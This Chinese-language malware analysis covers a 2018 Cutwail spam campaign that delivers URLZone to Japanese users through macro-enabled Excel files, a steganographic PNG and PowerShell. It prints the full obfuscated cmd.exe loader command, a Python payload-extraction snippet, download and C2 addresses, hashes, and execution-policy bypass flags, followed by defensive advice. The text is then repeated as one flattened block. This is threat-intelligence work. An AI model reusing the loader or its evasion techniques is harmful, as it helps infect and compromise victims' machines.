Cutwail垃圾邮件活动利用隐写术传播URLZone恶意软件技术分析

一、活动概述

2018年10月24日，CrowdStrike研究人员发现一起由NARWHAL SPIDER组织发起的垃圾邮件活动(Cutwail)。该活动针对日语用户，采用多阶段攻击链，最终传播URLZone恶意软件。

二、攻击流程分析

1. 初始感染载体

邮件特征：
- 包含恶意Excel附件，文件名格式：DOC2410201810{DIGIT[6]}.xls
- 样本SHA256：54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e
- 邮件正文通常为空或包含特定内容
恶意Excel文件：
- 需要用户启用宏才能触发恶意代码
- 使用VBA宏代码作为第一阶段攻击载荷

2. 攻击阶段分析

Stage 1: 反混淆阶段

执行方式：
- 通过VBA宏启动cmd.exe
- 使用复杂的命令混淆技术

关键命令：

cmd.exe /V:ON/C"set lW=o.crm`VPx57^^l(SEX]L8{-Y=GZU:K%0B[9ia2eb*yftp_/T$j1'vdMF^|C\Hwk^&)WAIDn+}h4,sg6;3 R""ON&&for %9 in (15,2,70,82,45,78,78,47,71,24,10,23,32,42,22,7,15,17,13,50,53,50,68,50,64,46,70,50,62,78,76,78,78,78,47,71,19,16,10,23,78,32,42,40,43,37,17,13,50,14,40,73,42,15,4,1,46,50,68,50,15,8,50,68,50,46,50,68,50,1,15,83,2,50,68,50,0,50,68,50,66,65,67,74,50,62,76,78,78,1,13,81,20,49,69,20,30,69,81,78,21,41,50,12,50,72,50,73,35,50,62,78,13,50,35,50,62,78,13,81,20,30,69,20,36,69,20,49,69,81,78,21,41,50,83,37,59,50,72,50,2,42,50,72,50,21,82,38,48,37,50,62,76,11,11,11,61,13,81,20,30,69,20,49,69,81,21,41,78,50,64,52,52,21,46,50,72,50,40,43,37,50,62,78,21,64,73,73,37,4,38,12,40,83,35,4,37,78,81,14,40,73,42,37,4,1,66,3,35,59,34,67,74,81,76,47,20,74,69,23,11,11,11,61,13,50,35,50,62,78,13,81,20,71,69,20,36,69,20,49,69,20,30,69,20,77,69,81,21,41,78,50,1,31,34,50,72,50,34,67,74,50,72,50,59,50,72,50,42,4,35,43,50,72,50,14,40,73,42,37,4,1,66,3,35,50,62,13,13,11,11,11,61,13,50,35,50,62,78,13,81,20,30,69,20,49,69,20,77,69,20,36,69,81,78,21,41,78,50,83,37,42,1,50,72,50,63,37,50,72,50,42,50,72,50,38,56,12,34,37,67,50,62,62,1,13,81,20,49,69,20,30,69,81,78,21,41,50,43,37,67,79,37,35,52,50,72,50,82,50,62,1,65,67,51,0,60,37,13,81,70,42,42,43,73,27,45,45,34,4,35,74,37,73,36,1,34,4,74,38,0,8,1,2,0,4,45,2,35,45,19,19,45,64,36,25,14,12,63,75,14,44,0,1,43,67,74,81,62,62,76,47,20,82,69,23,11,11,11,61,13,50,35,50,62,78,13,81,20,30,69,20,49,69,81,21,41,50,31,40,42,37,50,72,50,32,17,50,62,78,49,19,75,30,76,13,30,1,1,36,62,11,11,11,55,1,13,50,29,50,62,20,41,0,3,37,35,2,70,13,47,20,8,69,78,34,67,13,30,1,1,75,49,33,62,62,20,47,20,43,69,23,47,20,74,69,1,13,81,20,30,69,20,49,69,81,78,21,41,78,50,24,37,42,7,34,50,72,50,8,37,12,50,62,1,65,67,51,0,60,37,13,47,20,8,69,72,47,20,44,69,62,76,47,20,0,69,32,47,20,44,69,39,75,36,30,68,47,20,16,69,17,23,13,78,78,47,71,74,10,27,27,13,81,20,49,69,20,30,69,81,21,41,78,50,12,0,0,3,50,72,50,54,50,62,1,65,67,51,0,60,37,13,13,47,20,43,69,1,81,31,81,21,38,35,67,52,49,9,62,39,49,75,62,21,38,0,3,13,47,20,43,69,1,81,74,81,78,21,38,35,67,52,78,49,9,62,62,69,69,76,11,11,11,61,13,81,20,30,69,20,49,69,81,78,21,41,50,65,50,72,50,15,16,50,62,13,78,13,78,18,14,78,78,51,64,79,65,35,38,18,15,27,71,19,8,10,78,62,1,6,35,12,26,15,27,27,81,35,5,73,2,34,34,81,1,81,74,37,42,5,73,5,46,3,65,67,24,81,13,47,20,82,69,32,30,1,1,49,77,71,49,17,62,62,78,55,2,27,57,59,65,67,52,82,59,73,57,14,40,14,42,37,4,77,36,57,56,12,34,7,1,15,8,15,78,61,61,56,53,52,1,15,8,37,78,78,78,45,2,78,43,0,59,37,3,14,58,15,18,18,78,21,15,8,37,56,26,46,65,82,83,43,82,12,78,31,22,7,35,73,73,78,78,21,83,0,67,34,83,78,21,59,65,67,52,82,59,14,46,22,78,58,65,66,66,15,67,78,21,67,82,43,79,82,54,34,78,78,21,73,42,78,78,21,83,0,12,82,74,82,78,78,78,78,78,1,78,13,78,78,57,81,20,30,69,20,49,69,20,36,69,57,81,78,21,41,78,50,64,52,52,50,72,13,78,57,81,20,30,69,20,49,69,57,81,78,21,41,50,21,50,72,50,46,40,43,50,78,62,72,50,37,50,78,78,62,78,21,64,73,73,37,4,78,13,57,81,20,77,69,20,49,69,20,9,69,20,30,69,20,71,69,20,36,69,57,81,78,21,41,78,13,78,78,57,81,20,36,69,20,49,69,20,30,69,57,81,78,21,41,50,52,50,72,50,1,63,34,67,50,72,50,37,4,50,78,78,62,72,50,40,73,50,72,50,73,50,72,50,14,50,72,13,78,57,81,20,36,69,20,49,69,20,30,69,57,81,21,41,78,50,54,0,3,4,50,72,50,1,50,72,50,0,59,73,50,62,72,50,42,50,62,78,78,78,76,78,78,78,11,11,11,61,78,78,13,78,78,78,47,20,37,5,83,6,5,27,2,82,53,73,5,43,37,2,69,32,71,72,49,9,72,36,9,17,21,48,82,65,83,50,50,62,78,13,78,78,13,78,32,14,22,14,42,37,53,1,63,34,83,66,0,63,73,1,54,0,3,53,14,1,56,18,65,7,38,82,35,79,52,17,27,27,13,57,81,20,30,69,20,49,69,57,81,78,21,41,78,50,24,50,72,13,57,81,20,30,69,20,49,69,57,81,78,21,41,50,37,50,72,50,42,42,15,8,46,50,78,62,62,1,57,81,34,5,83,51,5,0,28,15,57,81,13,78,78,62,78,78,62,78,78,62,78,76,78,78,32,14,40,73,42,37,4,1,63,34,67,52,0,59,73,1,54,0,3,4,73,1,56,12,34,43,38,0,35,3,52,17,27,27,13,57,81,20,30,69,20,49,69,57,81,78,21,41,50,56,12,50,72,50,37,35,3,50,78,62,1,57,81,34,5,83,51,82,5,60,15,57,81,13,78,62,84)do set Rc=!Rc!!lW:~%9,1!&&if %9 geq 84 cmd /C!Rc:~-1334!"

Stage 2: PowerShell下载与隐写术解码

主要功能：
- 下载含有隐写术的PNG图片
- 从图片中解码出PowerShell命令
关键特征：
- 图片下载URL：https://images2.imgbox.com/ca/88/A2ZSlW6S_o.png
- 图片SHA256：73da11127aa1da5538d153ba7f063c74fb90af46da581f098f179e1bb8371904
- 使用蓝绿信道的4个最重要位隐藏数据

隐写术提取代码(Python)：

from PIL import Image
import sys

image = Image.open(sys.argv[1])
pixel = image.load()
payload = bytearray()

for y in xrange(3):
    for x in range(620):
        r, g, b = pixel[x, y]
        payload.append((b & 15) * 16 | (g & 15))

print(payload)

PowerShell执行方式：
- 使用-ExecutionPolicy Bypass绕过执行策略
- 使用-WindowStyle Hidden隐藏窗口
- 使用剪贴板作为命令传输媒介

Stage 3: 最终Payload投放

主要功能：
- 检查系统区域设置是否为日本(ja)
- 从指定URL下载最终payload
关键特征：
- 下载URL：http[:]//pigertime[.]com/mksettting
- 保存路径：%TEMP%\pain.exe
- User-Agent：Mozilla/5.0 (Windows NT; Windows NT 10.0; us-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6
最终Payload：
- SHA256：03fe36e396a2730fa9a51c455d39f2ba8168e5e7b1111102c1e349b6eac93778
- 类型：URLZone恶意软件变种

三、URLZone恶意软件分析

1. C2通信

C2服务器：https://oaril[.]com/auth/

使用的公钥：

2. 后续活动

成功安装URLZone后，C2服务器会发送请求下载并执行其他恶意payload。在之前的活动中，下载的是Gozi ISFB恶意软件。

四、技术亮点与防御建议

1. 技术亮点

多阶段攻击链：使用VBA→批处理→PowerShell的多阶段执行方式
隐写术应用：利用PNG图片的蓝绿信道隐藏PowerShell命令
剪贴板利用：使用剪贴板作为命令传输媒介
区域锁定：仅针对日语系统用户进行攻击

2. 防御建议

邮件安全：
- 禁用Office宏执行或限制宏使用
- 对可疑邮件附件进行沙箱分析
终端防护：
- 监控PowerShell的异常使用模式
- 阻止可疑的进程链（如Excel→cmd→PowerShell）
网络防护：
- 拦截已知恶意域名（如pigertime[.]com, oaril[.]com）
- 监控异常图片下载行为
隐写术检测：
- 实现图片隐写术检测机制
- 对从图片中提取的数据进行安全分析

五、总结

Cutwail垃圾邮件活动展示了NARWHAL SPIDER组织采用的新技术趋势，特别是隐写术的应用。这种技术可以有效绕过传统安全检测，增加感染成功率。安全团队应关注此类技术的演变，并更新防御策略以应对这些高级威胁。

Cutwail垃圾邮件活动利用隐写术传播URLZone恶意软件技术分析一、活动概述 2018年10月24日，CrowdStrike研究人员发现一起由NARWHAL SPIDER组织发起的垃圾邮件活动(Cutwail)。该活动针对日语用户，采用多阶段攻击链，最终传播URLZone恶意软件。二、攻击流程分析 1. 初始感染载体邮件特征：包含恶意Excel附件，文件名格式： DOC2410201810{DIGIT[6]}.xls 样本SHA256： 54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e 邮件正文通常为空或包含特定内容恶意Excel文件：需要用户启用宏才能触发恶意代码使用VBA宏代码作为第一阶段攻击载荷 2. 攻击阶段分析 Stage 1: 反混淆阶段执行方式：通过VBA宏启动 cmd.exe 使用复杂的命令混淆技术关键命令： Stage 2: PowerShell下载与隐写术解码主要功能：下载含有隐写术的PNG图片从图片中解码出PowerShell命令关键特征：图片下载URL： https://images2.imgbox.com/ca/88/A2ZSlW6S_o.png 图片SHA256： 73da11127aa1da5538d153ba7f063c74fb90af46da581f098f179e1bb8371904 使用蓝绿信道的4个最重要位隐藏数据隐写术提取代码(Python) ： PowerShell执行方式：使用 -ExecutionPolicy Bypass 绕过执行策略使用 -WindowStyle Hidden 隐藏窗口使用剪贴板作为命令传输媒介 Stage 3: 最终Payload投放主要功能：检查系统区域设置是否为日本(ja) 从指定URL下载最终payload 关键特征：下载URL： http[:]//pigertime[.]com/mksettting 保存路径： %TEMP%\pain.exe User-Agent： Mozilla/5.0 (Windows NT; Windows NT 10.0; us-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6 最终Payload ： SHA256： 03fe36e396a2730fa9a51c455d39f2ba8168e5e7b1111102c1e349b6eac93778 类型：URLZone恶意软件变种三、URLZone恶意软件分析 1. C2通信 C2服务器： https://oaril[.]com/auth/ 使用的公钥： 2. 后续活动成功安装URLZone后，C2服务器会发送请求下载并执行其他恶意payload。在之前的活动中，下载的是Gozi ISFB恶意软件。四、技术亮点与防御建议 1. 技术亮点多阶段攻击链：使用VBA→批处理→PowerShell的多阶段执行方式隐写术应用：利用PNG图片的蓝绿信道隐藏PowerShell命令剪贴板利用：使用剪贴板作为命令传输媒介区域锁定：仅针对日语系统用户进行攻击 2. 防御建议邮件安全：禁用Office宏执行或限制宏使用对可疑邮件附件进行沙箱分析终端防护：监控PowerShell的异常使用模式阻止可疑的进程链（如Excel→cmd→PowerShell）网络防护：拦截已知恶意域名（如pigertime[ .]com, oaril[ . ]com）监控异常图片下载行为隐写术检测：实现图片隐写术检测机制对从图片中提取的数据进行安全分析五、总结 Cutwail垃圾邮件活动展示了NARWHAL SPIDER组织采用的新技术趋势，特别是隐写术的应用。这种技术可以有效绕过传统安全检测，增加感染成功率。安全团队应关注此类技术的演变，并更新防御策略以应对这些高级威胁。